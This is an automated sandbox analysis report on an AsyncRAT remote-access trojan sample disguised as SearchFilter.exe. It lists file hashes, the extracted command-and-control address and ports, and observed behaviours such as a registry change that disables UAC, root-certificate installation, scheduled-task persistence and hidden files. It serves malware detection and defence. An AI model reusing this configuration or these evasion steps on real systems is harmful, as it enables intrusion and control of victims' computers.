asyncrat | 5215d350f917e8f1df09581b835fb5189a00461a1041b898505bd39180203c1d

Analysis

max time kernel
601s
max time network
614s
platform
windows10-2004_x64
resource
win10v2004-20240709-en
resource tags

arch:x64arch:x86image:win10v2004-20240709-enlocale:en-usos:windows10-2004-x64system
submitted
30-07-2024 00:32

Sharing

Copy URL

Twitter E-mail

Report Analysis Logs

General

Target

SearchFilter.exe
Size

132.0MB
MD5

75b63c0f5dcee7c6000edcc705167207
SHA1

598c078a840f152480065d95ffb99127b1ef6e08
SHA256

59909bf0cc831cdb3553fa31eceeb8be207a65d2072da65fb6b38577770b036f
SHA512

727d0be33710d2c9421dc5e2e4d39479f683f4aff650a7b419c13f429762609885fba43ff370bf23dc3c6e82cf74cf383c59bb58739a14ddfc0fafad07d430da
SSDEEP

1572864:U4sMLl/BkZTVV2iplzf+ekzrMdTOG0AfhgojwlwVgmPQtn06H9rejAEdCoIZXCVK:Zl/BkVVPBDgmPKa5Wnu3X7

Score

10^/10

asyncrat 1 2 defense_evasion discovery evasion execution rat trojan

Malware Config

Extracted

Family

asyncrat

Version

0.5.8

Botnet

20.82.141.111:6570

Mutex

mutex_boot-AsZzpYBmoad2u1S

Attributes

delay
3
install
false
install_folder
%AppData%

aes.plain

Extracted

Family

asyncrat

Version

0.5.8

Botnet

20.82.141.111:6576

Mutex

mutex_kernel-SLhrSjUhEXvqIIS

Attributes

delay
3
install
false
install_folder
%AppData%

aes.plain

Signatures

AsyncRat
AsyncRAT is designed to remotely monitor and control other computers written in C#.
rat asyncrat

UAC bypass 3 TTPs 1 IoCs

evasion trojan

Bypass User Account Control

T1548.002

Disable or Modify Tools

T1562.001

Modify Registry

T1112

description	ioc	Process
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA = "0"	reg.exe

Async RAT payload 2 IoCs

rat

resource	yara_rule
behavioral1/memory/3456-1030-0x0000000003400000-0x0000000003412000-memory.dmp	family_asyncrat
behavioral1/memory/3456-1126-0x0000000007C40000-0x0000000007C52000-memory.dmp	family_asyncrat

Command and Scripting Interpreter: PowerShell 1 TTPs 13 IoCs

Start PowerShell.

execution

PowerShell

T1059.001

pid	Process
1028	powershell.exe
3068	powershell.exe
4016	powershell.exe
4648	powershell.exe
3688	powershell.exe
3488	powershell.exe
2744	powershell.exe
6392	powershell.exe
6604	powershell.exe
4264	powershell.exe
4120	powershell.exe
740	powershell.exe
6844	powershell.exe

Checks computer location settings 2 TTPs 1 IoCs

Looks up country code configured in the registry, likely geofence.

Query Registry

T1012

System Information Discovery

T1082

description	ioc	Process
Key value queried	\REGISTRY\USER\S-1-5-21-701583114-2636601053-947405450-1000\Control Panel\International\Geo\Nation	SearchFilter.exe

Executes dropped EXE 14 IoCs

pid	Process
2992	7z.exe
3384	7z.exe
1828	taskhostw.exe
4876	7z.exe
4080	Runtime Broker.exe
3544	Runtime Broker.exe
208	Runtime Broker.exe
4468	Microsoft.exe
4956	Microsoft.exe
4812	Microsoft.exe
3988	7z.exe
4476	taskhostw.exe
4868	Runtime Broker.exe
6336	taskhostw.exe

Loads dropped DLL 24 IoCs

pid	Process
3068	powershell.exe
3068	powershell.exe
1828	taskhostw.exe
4080	Runtime Broker.exe
4080	Runtime Broker.exe
4080	Runtime Broker.exe
4080	Runtime Broker.exe
3544	Runtime Broker.exe
3544	Runtime Broker.exe
3544	Runtime Broker.exe
3544	Runtime Broker.exe
3544	Runtime Broker.exe
208	Runtime Broker.exe
4468	Microsoft.exe
4956	Microsoft.exe
4956	Microsoft.exe
4956	Microsoft.exe
4956	Microsoft.exe
4956	Microsoft.exe
4812	Microsoft.exe
4476	taskhostw.exe
4868	Runtime Broker.exe
4868	Runtime Broker.exe
6336	taskhostw.exe

Hide Artifacts: Hidden Window 1 TTPs 1 IoCs

Windows that would typically be displayed when an application carries out an operation can be hidden.

defense_evasion

Hidden Window

T1564.003

pid	Process
220	cmd.exe

Looks up external IP address via web service 1 IoCs

Uses a legitimate IP lookup service to find the infected system's external IP.

flow	ioc
75	api.ipify.org

Enumerates processes with tasklist 1 TTPs 38 IoCs

discovery

Process Discovery

T1057

pid	Process
4024	tasklist.exe
2116	tasklist.exe
692	tasklist.exe
4100	tasklist.exe
4980	tasklist.exe
4512	tasklist.exe
2928	tasklist.exe
4252	tasklist.exe
3856	tasklist.exe
1176	tasklist.exe
1112	tasklist.exe
1016	tasklist.exe
4312	tasklist.exe
3280	tasklist.exe
3884	tasklist.exe
4024	tasklist.exe
1436	tasklist.exe
184	tasklist.exe
3488	tasklist.exe
4996	tasklist.exe
712	tasklist.exe
1632	tasklist.exe
4996	tasklist.exe
2952	tasklist.exe
2104	tasklist.exe
464	tasklist.exe
2748	tasklist.exe
1828	tasklist.exe
4924	tasklist.exe
5104	tasklist.exe
768	tasklist.exe
1652	tasklist.exe
1828	tasklist.exe
2408	tasklist.exe
3668	tasklist.exe
3576	tasklist.exe
4428	tasklist.exe
1072	tasklist.exe

Hide Artifacts: Hidden Files and Directories 1 TTPs 1 IoCs

defense_evasion

Hidden Files and Directories

T1564.001

pid	Process
3200	cmd.exe

System Location Discovery: System Language Discovery 1 TTPs 64 IoCs

Attempt gather information about the system language of a victim in order to infer the geographical location of that host.

discovery

System Language Discovery

T1614.001

description	ioc	Process
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	tasklist.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	tasklist.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	tasklist.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	tasklist.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	7z.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	tasklist.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	tasklist.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	reg.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	tasklist.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	cmd.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	cmd.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	cmd.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	7z.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	cmd.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	cmd.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	reg.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	tasklist.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	cmd.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	tasklist.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	cmd.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	cmd.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	cmd.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	Runtime Broker.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	cmd.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	powershell.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	cmd.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	tasklist.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	cmd.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	cmd.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	WMIC.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	cmd.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	tasklist.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	cmd.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	attrib.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	Runtime Broker.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	cmd.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	reg.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	cmd.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	tasklist.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	tasklist.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	cmd.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	taskkill.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	tasklist.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	7z.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	reg.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	cmd.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	cmd.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	cmd.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	tasklist.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	tasklist.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	tasklist.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	cmd.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	cmd.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	cmd.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	cmd.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	tasklist.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	reg.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	reg.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	cmd.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	cmd.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	cmd.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	cmd.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	SearchFilter.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	tasklist.exe

Checks processor information in registry 2 TTPs 7 IoCs

Processor information is often read in order to detect sandboxing environments.

Query Registry

T1012

System Information Discovery

T1082

description	ioc	Process
Key opened	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0	SearchFilter.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\~MHz	SearchFilter.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\ProcessorNameString	SearchFilter.exe
Key opened	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\1	SearchFilter.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\1\~MHz	SearchFilter.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\1\ProcessorNameString	SearchFilter.exe
Key opened	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\2	SearchFilter.exe

Kills process with taskkill 2 IoCs

evasion

pid	Process
4712	taskkill.exe
2436	taskkill.exe

Modifies system certificate store 2 TTPs 3 IoCs

evasion spyware trojan

Install Root Certificate

T1553.004

Modify Registry

T1112

description	ioc	Process
Key created	\REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\B1BC968BD4F49D622AA89A81F2150152A41D829C	Microsoft.exe
Set value (data)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\B1BC968BD4F49D622AA89A81F2150152A41D829C\Blob = 0400000001000000100000003e455215095192e1b75d379fb187298a0f00000001000000140000005a6d07b6371d966a2fb6ba92828ce5512a49513d090000000100000068000000306606082b0601050507030206082b06010505070303060a2b0601040182370a030406082b0601050507030406082b0601050508020206082b0601050507030606082b0601050507030706082b0601050507030906082b0601050507030106082b06010505070308530000000100000040000000303e301f06092b06010401a032010130123010060a2b0601040182373c0101030200c0301b060567810c010330123010060a2b0601040182373c0101030200c00b000000010000003000000047006c006f00620061006c005300690067006e00200052006f006f00740020004300410020002d002000520031000000620000000100000020000000ebd41040e4bb3ec742c9e381d31ef2a41a48b6685c96e7cef3c1df6cd4331c99140000000100000014000000607b661a450d97ca89502f7d04cd34a8fffcfd4b1d00000001000000100000006ee7f3b060d10e90a31ba3471b9992367f000000010000000c000000300a06082b060105050703097a000000010000000c000000300a06082b060105050703097e00000001000000080000000000042beb77d501030000000100000014000000b1bc968bd4f49d622aa89a81f2150152a41d829c190000000100000010000000a823b4a20180beb460cab955c24d7e21200000000100000079030000308203753082025da003020102020b040000000001154b5ac394300d06092a864886f70d01010505003057310b300906035504061302424531193017060355040a1310476c6f62616c5369676e206e762d73613110300e060355040b1307526f6f74204341311b301906035504031312476c6f62616c5369676e20526f6f74204341301e170d3938303930313132303030305a170d3238303132383132303030305a3057310b300906035504061302424531193017060355040a1310476c6f62616c5369676e206e762d73613110300e060355040b1307526f6f74204341311b301906035504031312476c6f62616c5369676e20526f6f7420434130820122300d06092a864886f70d01010105000382010f003082010a0282010100da0ee6998dcea3e34f8a7efbf18b83256bea481ff12ab0b9951104bdf063d1e26766cf1cddcf1b482bee8d898e9aaf298065abe9c72d12cbab1c4c7007a13d0a30cd158d4ff8ddd48c50151cef50eec42ef7fce952f2917de06dd535308e5e4373f241e9d56ae3b2893a5639386f063c88695b2a4dc5a754b86c89cc9bf93ccae5fd89f5123c927896d6dc746e934461d18dc746b2750e86e8198ad56d6cd5781695a2e9c80a38ebf224134f73549313853a1bbc1e34b58b058cb9778bb1db1f2091ab09536e90ce7b3774b97047912251631679aeb1ae412608c8192bd146aa48d6642ad78334ff2c2ac16c19434a0785e7d37cf62168efeaf2529f7f9390cf0203010001a3423040300e0603551d0f0101ff040403020106300f0603551d130101ff040530030101ff301d0603551d0e04160414607b661a450d97ca89502f7d04cd34a8fffcfd4b300d06092a864886f70d01010505000382010100d673e77c4f76d08dbfecbaa2be34c52832b57cfc6c9c2c2bbd099e53bf6b5eaa1148b6e508a3b3ca3d614dd34609b33ec3a0e363551bf2baefad39e143b938a3e62f8a263befa05056f9c60afd38cdc40b705194979804dfc35f94d515c914419cc45d7564150dff5530ec868fff0def2cb96346f6aafcdfbc69fd2e1248649ae095f0a6ef298f01b115b50c1da5fe692c6924781eb3a71c7162eecac897ac175d8ac2f847866e2ac4563195d06789852bf96ca65d469d0caa82e49951dd70b7db563d61e46ae15cd6f6fe3dde41cc07ae6352bf5353f42be9c7fdb6f7825f85d24118db81b3041cc51fa4806f1520c9de0c880a1dd66655e2fc48c9292669e0	Microsoft.exe
Set value (data)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\B1BC968BD4F49D622AA89A81F2150152A41D829C\Blob = 5c000000010000000400000000080000190000000100000010000000a823b4a20180beb460cab955c24d7e21030000000100000014000000b1bc968bd4f49d622aa89a81f2150152a41d829c7e00000001000000080000000000042beb77d5017a000000010000000c000000300a06082b060105050703097f000000010000000c000000300a06082b060105050703091d00000001000000100000006ee7f3b060d10e90a31ba3471b999236140000000100000014000000607b661a450d97ca89502f7d04cd34a8fffcfd4b620000000100000020000000ebd41040e4bb3ec742c9e381d31ef2a41a48b6685c96e7cef3c1df6cd4331c990b000000010000003000000047006c006f00620061006c005300690067006e00200052006f006f00740020004300410020002d002000520031000000530000000100000040000000303e301f06092b06010401a032010130123010060a2b0601040182373c0101030200c0301b060567810c010330123010060a2b0601040182373c0101030200c0090000000100000068000000306606082b0601050507030206082b06010505070303060a2b0601040182370a030406082b0601050507030406082b0601050508020206082b0601050507030606082b0601050507030706082b0601050507030906082b0601050507030106082b060105050703080f00000001000000140000005a6d07b6371d966a2fb6ba92828ce5512a49513d0400000001000000100000003e455215095192e1b75d379fb187298a200000000100000079030000308203753082025da003020102020b040000000001154b5ac394300d06092a864886f70d01010505003057310b300906035504061302424531193017060355040a1310476c6f62616c5369676e206e762d73613110300e060355040b1307526f6f74204341311b301906035504031312476c6f62616c5369676e20526f6f74204341301e170d3938303930313132303030305a170d3238303132383132303030305a3057310b300906035504061302424531193017060355040a1310476c6f62616c5369676e206e762d73613110300e060355040b1307526f6f74204341311b301906035504031312476c6f62616c5369676e20526f6f7420434130820122300d06092a864886f70d01010105000382010f003082010a0282010100da0ee6998dcea3e34f8a7efbf18b83256bea481ff12ab0b9951104bdf063d1e26766cf1cddcf1b482bee8d898e9aaf298065abe9c72d12cbab1c4c7007a13d0a30cd158d4ff8ddd48c50151cef50eec42ef7fce952f2917de06dd535308e5e4373f241e9d56ae3b2893a5639386f063c88695b2a4dc5a754b86c89cc9bf93ccae5fd89f5123c927896d6dc746e934461d18dc746b2750e86e8198ad56d6cd5781695a2e9c80a38ebf224134f73549313853a1bbc1e34b58b058cb9778bb1db1f2091ab09536e90ce7b3774b97047912251631679aeb1ae412608c8192bd146aa48d6642ad78334ff2c2ac16c19434a0785e7d37cf62168efeaf2529f7f9390cf0203010001a3423040300e0603551d0f0101ff040403020106300f0603551d130101ff040530030101ff301d0603551d0e04160414607b661a450d97ca89502f7d04cd34a8fffcfd4b300d06092a864886f70d01010505000382010100d673e77c4f76d08dbfecbaa2be34c52832b57cfc6c9c2c2bbd099e53bf6b5eaa1148b6e508a3b3ca3d614dd34609b33ec3a0e363551bf2baefad39e143b938a3e62f8a263befa05056f9c60afd38cdc40b705194979804dfc35f94d515c914419cc45d7564150dff5530ec868fff0def2cb96346f6aafcdfbc69fd2e1248649ae095f0a6ef298f01b115b50c1da5fe692c6924781eb3a71c7162eecac897ac175d8ac2f847866e2ac4563195d06789852bf96ca65d469d0caa82e49951dd70b7db563d61e46ae15cd6f6fe3dde41cc07ae6352bf5353f42be9c7fdb6f7825f85d24118db81b3041cc51fa4806f1520c9de0c880a1dd66655e2fc48c9292669e0	Microsoft.exe

Runs net.exe

Scheduled Task/Job: Scheduled Task 1 TTPs 5 IoCs

Schtasks is often used by malware for persistence or to perform post-infection execution.

persistence execution

Scheduled Task

T1053.005

pid	Process
4264	schtasks.exe
2224	schtasks.exe
5088	schtasks.exe
464	schtasks.exe
4672	schtasks.exe

Suspicious behavior: EnumeratesProcesses 45 IoCs

pid	Process
1240	SearchFilter.exe
1240	SearchFilter.exe
3068	powershell.exe
3068	powershell.exe
4016	powershell.exe
4016	powershell.exe
4016	powershell.exe
1028	powershell.exe
1028	powershell.exe
1028	powershell.exe
4016	powershell.exe
4648	powershell.exe
4648	powershell.exe
4648	powershell.exe
4080	Runtime Broker.exe
4080	Runtime Broker.exe
208	Runtime Broker.exe
208	Runtime Broker.exe
4264	powershell.exe
4264	powershell.exe
4264	powershell.exe
4264	powershell.exe
4120	powershell.exe
4120	powershell.exe
4120	powershell.exe
3688	powershell.exe
3688	powershell.exe
3688	powershell.exe
3688	powershell.exe
3488	powershell.exe
3488	powershell.exe
2744	powershell.exe
2744	powershell.exe
740	powershell.exe
740	powershell.exe
4868	Runtime Broker.exe
4868	Runtime Broker.exe
4868	Runtime Broker.exe
4868	Runtime Broker.exe
6392	powershell.exe
6392	powershell.exe
6604	powershell.exe
6604	powershell.exe
6844	powershell.exe
6844	powershell.exe

Suspicious behavior: GetForegroundWindowSpam 1 IoCs

pid	Process
3456	Explorer.EXE

Suspicious use of AdjustPrivilegeToken 64 IoCs

description	pid	Process
Token: SeShutdownPrivilege	1928	SearchFilter.exe
Token: SeCreatePagefilePrivilege	1928	SearchFilter.exe
Token: SeShutdownPrivilege	1928	SearchFilter.exe
Token: SeCreatePagefilePrivilege	1928	SearchFilter.exe
Token: SeShutdownPrivilege	1928	SearchFilter.exe
Token: SeCreatePagefilePrivilege	1928	SearchFilter.exe
Token: SeShutdownPrivilege	1928	SearchFilter.exe
Token: SeCreatePagefilePrivilege	1928	SearchFilter.exe
Token: SeShutdownPrivilege	1928	SearchFilter.exe
Token: SeCreatePagefilePrivilege	1928	SearchFilter.exe
Token: SeShutdownPrivilege	1928	SearchFilter.exe
Token: SeCreatePagefilePrivilege	1928	SearchFilter.exe
Token: SeShutdownPrivilege	1928	SearchFilter.exe
Token: SeCreatePagefilePrivilege	1928	SearchFilter.exe
Token: SeShutdownPrivilege	1928	SearchFilter.exe
Token: SeCreatePagefilePrivilege	1928	SearchFilter.exe
Token: SeShutdownPrivilege	1928	SearchFilter.exe
Token: SeCreatePagefilePrivilege	1928	SearchFilter.exe
Token: SeShutdownPrivilege	1928	SearchFilter.exe
Token: SeCreatePagefilePrivilege	1928	SearchFilter.exe
Token: SeShutdownPrivilege	1928	SearchFilter.exe
Token: SeCreatePagefilePrivilege	1928	SearchFilter.exe
Token: SeShutdownPrivilege	1928	SearchFilter.exe
Token: SeCreatePagefilePrivilege	1928	SearchFilter.exe
Token: SeShutdownPrivilege	1928	SearchFilter.exe
Token: SeCreatePagefilePrivilege	1928	SearchFilter.exe
Token: SeShutdownPrivilege	1928	SearchFilter.exe
Token: SeCreatePagefilePrivilege	1928	SearchFilter.exe
Token: SeDebugPrivilege	1652	tasklist.exe
Token: SeShutdownPrivilege	1928	SearchFilter.exe
Token: SeCreatePagefilePrivilege	1928	SearchFilter.exe
Token: SeDebugPrivilege	1828	tasklist.exe
Token: SeDebugPrivilege	2408	tasklist.exe
Token: SeDebugPrivilege	712	tasklist.exe
Token: SeShutdownPrivilege	1928	SearchFilter.exe
Token: SeCreatePagefilePrivilege	1928	SearchFilter.exe
Token: SeDebugPrivilege	2748	tasklist.exe
Token: SeDebugPrivilege	4024	tasklist.exe
Token: SeDebugPrivilege	2116	tasklist.exe
Token: SeDebugPrivilege	4980	tasklist.exe
Token: SeShutdownPrivilege	1928	SearchFilter.exe
Token: SeCreatePagefilePrivilege	1928	SearchFilter.exe
Token: SeDebugPrivilege	3668	tasklist.exe
Token: SeDebugPrivilege	3280	tasklist.exe
Token: SeDebugPrivilege	3856	tasklist.exe
Token: SeShutdownPrivilege	1928	SearchFilter.exe
Token: SeCreatePagefilePrivilege	1928	SearchFilter.exe
Token: SeDebugPrivilege	1176	tasklist.exe
Token: SeDebugPrivilege	1632	tasklist.exe
Token: SeDebugPrivilege	1828	tasklist.exe
Token: SeShutdownPrivilege	1928	SearchFilter.exe
Token: SeCreatePagefilePrivilege	1928	SearchFilter.exe
Token: SeDebugPrivilege	692	tasklist.exe
Token: SeDebugPrivilege	4996	tasklist.exe
Token: SeDebugPrivilege	3884	tasklist.exe
Token: SeShutdownPrivilege	1928	SearchFilter.exe
Token: SeCreatePagefilePrivilege	1928	SearchFilter.exe
Token: SeDebugPrivilege	4024	tasklist.exe
Token: SeDebugPrivilege	1112	tasklist.exe
Token: SeShutdownPrivilege	1928	SearchFilter.exe
Token: SeCreatePagefilePrivilege	1928	SearchFilter.exe
Token: SeShutdownPrivilege	1928	SearchFilter.exe
Token: SeCreatePagefilePrivilege	1928	SearchFilter.exe
Token: SeShutdownPrivilege	1928	SearchFilter.exe

Suspicious use of WriteProcessMemory 64 IoCs

description	pid	Process	procid_target
PID 1928 wrote to memory of 1424	1928	SearchFilter.exe	89
PID 1928 wrote to memory of 1424	1928	SearchFilter.exe	89
PID 1928 wrote to memory of 1424	1928	SearchFilter.exe	89
PID 1928 wrote to memory of 1424	1928	SearchFilter.exe	89
PID 1928 wrote to memory of 1424	1928	SearchFilter.exe	89
PID 1928 wrote to memory of 1424	1928	SearchFilter.exe	89
PID 1928 wrote to memory of 1424	1928	SearchFilter.exe	89
PID 1928 wrote to memory of 1424	1928	SearchFilter.exe	89
PID 1928 wrote to memory of 1424	1928	SearchFilter.exe	89
PID 1928 wrote to memory of 1424	1928	SearchFilter.exe	89
PID 1928 wrote to memory of 1424	1928	SearchFilter.exe	89
PID 1928 wrote to memory of 1424	1928	SearchFilter.exe	89
PID 1928 wrote to memory of 1424	1928	SearchFilter.exe	89
PID 1928 wrote to memory of 1424	1928	SearchFilter.exe	89
PID 1928 wrote to memory of 1424	1928	SearchFilter.exe	89
PID 1928 wrote to memory of 1424	1928	SearchFilter.exe	89
PID 1928 wrote to memory of 1424	1928	SearchFilter.exe	89
PID 1928 wrote to memory of 1424	1928	SearchFilter.exe	89
PID 1928 wrote to memory of 1424	1928	SearchFilter.exe	89
PID 1928 wrote to memory of 1424	1928	SearchFilter.exe	89
PID 1928 wrote to memory of 1424	1928	SearchFilter.exe	89
PID 1928 wrote to memory of 1424	1928	SearchFilter.exe	89
PID 1928 wrote to memory of 1424	1928	SearchFilter.exe	89
PID 1928 wrote to memory of 1424	1928	SearchFilter.exe	89
PID 1928 wrote to memory of 1424	1928	SearchFilter.exe	89
PID 1928 wrote to memory of 1424	1928	SearchFilter.exe	89
PID 1928 wrote to memory of 1424	1928	SearchFilter.exe	89
PID 1928 wrote to memory of 1424	1928	SearchFilter.exe	89
PID 1928 wrote to memory of 1424	1928	SearchFilter.exe	89
PID 1928 wrote to memory of 1424	1928	SearchFilter.exe	89
PID 1928 wrote to memory of 1424	1928	SearchFilter.exe	89
PID 1928 wrote to memory of 1424	1928	SearchFilter.exe	89
PID 1928 wrote to memory of 2780	1928	SearchFilter.exe	90
PID 1928 wrote to memory of 2780	1928	SearchFilter.exe	90
PID 1928 wrote to memory of 2780	1928	SearchFilter.exe	90
PID 1928 wrote to memory of 1240	1928	SearchFilter.exe	91
PID 1928 wrote to memory of 1240	1928	SearchFilter.exe	91
PID 1928 wrote to memory of 1240	1928	SearchFilter.exe	91
PID 2780 wrote to memory of 4116	2780	cmd.exe	93
PID 2780 wrote to memory of 4116	2780	cmd.exe	93
PID 2780 wrote to memory of 4116	2780	cmd.exe	93
PID 4116 wrote to memory of 4672	4116	net.exe	94
PID 4116 wrote to memory of 4672	4116	net.exe	94
PID 4116 wrote to memory of 4672	4116	net.exe	94
PID 1928 wrote to memory of 2396	1928	SearchFilter.exe	95
PID 1928 wrote to memory of 2396	1928	SearchFilter.exe	95
PID 1928 wrote to memory of 2396	1928	SearchFilter.exe	95
PID 1928 wrote to memory of 840	1928	SearchFilter.exe	97
PID 1928 wrote to memory of 840	1928	SearchFilter.exe	97
PID 1928 wrote to memory of 840	1928	SearchFilter.exe	97
PID 840 wrote to memory of 3472	840	cmd.exe	99
PID 840 wrote to memory of 3472	840	cmd.exe	99
PID 840 wrote to memory of 3472	840	cmd.exe	99
PID 1928 wrote to memory of 1176	1928	SearchFilter.exe	100
PID 1928 wrote to memory of 1176	1928	SearchFilter.exe	100
PID 1928 wrote to memory of 1176	1928	SearchFilter.exe	100
PID 1176 wrote to memory of 1480	1176	cmd.exe	102
PID 1176 wrote to memory of 1480	1176	cmd.exe	102
PID 1176 wrote to memory of 1480	1176	cmd.exe	102
PID 1928 wrote to memory of 4452	1928	SearchFilter.exe	103
PID 1928 wrote to memory of 4452	1928	SearchFilter.exe	103
PID 1928 wrote to memory of 4452	1928	SearchFilter.exe	103
PID 4452 wrote to memory of 3836	4452	cmd.exe	105
PID 4452 wrote to memory of 3836	4452	cmd.exe	105

Uses Task Scheduler COM API 1 TTPs
The Task Scheduler COM API can be used to schedule applications to run on boot or at set times.
persistence

Query Registry
T1012

Views/modifies file attributes 1 TTPs 1 IoCs

evasion

Hidden Files and Directories

T1564.001

pid	Process
3036	attrib.exe

C:\Windows\Explorer.EXE
C:\Windows\Explorer.EXE
1⤵
- Suspicious behavior: GetForegroundWindowSpam
PID:3456
- C:\Users\Admin\AppData\Local\Temp\SearchFilter.exe
  "C:\Users\Admin\AppData\Local\Temp\SearchFilter.exe"
  2⤵
  - Checks computer location settings
  - Checks processor information in registry
  - Suspicious use of AdjustPrivilegeToken
  - Suspicious use of WriteProcessMemory
  PID:1928
- - C:\Users\Admin\AppData\Local\Temp\SearchFilter.exe
